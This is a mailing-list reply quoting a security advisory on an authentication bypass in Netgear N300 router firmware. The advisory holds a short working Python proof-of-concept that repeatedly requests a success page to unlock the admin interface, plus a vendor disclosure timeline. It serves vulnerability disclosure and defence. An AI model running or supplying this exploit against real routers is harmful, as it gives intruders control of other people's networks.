I can confirm that this is actively being exploited in the wild as we speak. I got owned last week.
On Tue, Oct 6, 2015 at 7:59 AM, Alexandre Herzog <[email protected]> wrote: > ############################################################# > # > # COMPASS SECURITY ADVISORY > # http://www.csnc.ch/en/downloads/advisories.html > # > ############################################################# > # > # Product: Netgear Router Firmware N300_1.1.0.31_1.0.1.img > # and N300-1.1.0.28_1.0.1.img > # Vendor: NETGEAR > # CVE ID: requested > # Subject: Authentication Bypass > # Risk: High > # Effect: Remotely exploitable over LAN/WLAN > # Author: Daniel Haake ([email protected]) > # Date: 06.10.2015 > # > ############################################################# > > > Introduction: > ------------- > Multiple NETGEAR wireless routers are out of the box vulnerable > to an authentication bypass attack. No router options has to > be changed to exploit the issue. So an attacker can access the > administration > interface of the router without submitting any valid username and > password, just by requesting a special URL several times. > > > Affected: > --------- > - Router Firmware: N300_1.1.0.31_1.0.1.img > - Router Firmware; N300-1.1.0.28_1.0.1.img > - tested and confirmed on the WNR1000v4 Router with both firmwares > - other products may also be vulnerable because the firmware is used in > multiple devices > > > Technical Description: > ---------------------- > The attacker can exploit the issue by using a browser or writing a simple > exploit. > 1. When a user wants to access the web interface, a http basic > authentication login process is initiated > 2. If he does not know the username and password he gets redirected to the > 401_access_denied.htm file > 3. An attacker now has to call the URL > http://<ROUTER-IP>/BRS_netgear_success.html multiple times > -> After that if he can access the administration web interface and there > is > no username/password prompt > > > Example Python script: > ---------------------- > import os > import urllib2 > import time > import sys > > try: > first = urllib2.urlopen("http://"; + sys.argv[1]) > print "No password protection!" > except: > print "Password protection detected!" > print "Executing exploit..." > for i in range(0,3): > time.sleep(1) > urllib2.urlopen("http://"; + sys.argv[1] + > "/BRS_netgear_success.html") > > second = urllib2.urlopen("http://"; + sys.argv[1]) > if second.getcode() == 200: > print "Bypass successfull. Now use your browser to have a > look at the admin interface." > > > Workaround/Fix: > --------------- > None so far. A patch already fixing this vulnerability was developed by > Netgear but not released so far > (see timeline below). > > > Timeline: > --------- > Vendor Status: works on patch-release > 21.07.2015: Vendor notified per email ([email protected]) > -> No response > 23.07.2015: Vendor notified via official chat support > 24.07.2015: Support redirected notification to the technical team > 29.07.2015: Requested status update and asked if they need further > assistance > -> No response > 21.08.2015: Notified vendor that we will go full disclosure within 90 days > if they do not react > 03.09.2015: Support again said that they will redirect it to the technical > team > 03.09.2015: Netgear sent some beta firmware version to look if the > vulnerability is fixed > 03.09.2015: Confirmed to Netgear that the problem is solved in this version > Asked Netgear when they plan to release the firmware with this > security fix > 11.09.2015: Response from Netgear saying they will not disclose the patch > release day > 15.09.2015: Asked Netgear again when they plan to publish the security fix > for the second time > -> No response > 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS > 06.10.2015: Forced public release of this advisory to follow up on [2] > > > References: > ----------- > [1] http://support.netgear.com/product/WNR1000v4 > [2] > > http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.ht > ml > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
